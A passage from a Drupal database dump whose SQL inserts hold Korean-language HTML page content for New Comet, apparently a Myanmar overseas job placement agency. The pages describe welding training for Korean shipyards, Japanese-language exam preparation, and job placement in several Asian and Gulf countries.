Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 144, 'ja', 0, '<p>Coming Soon....</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 144, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun 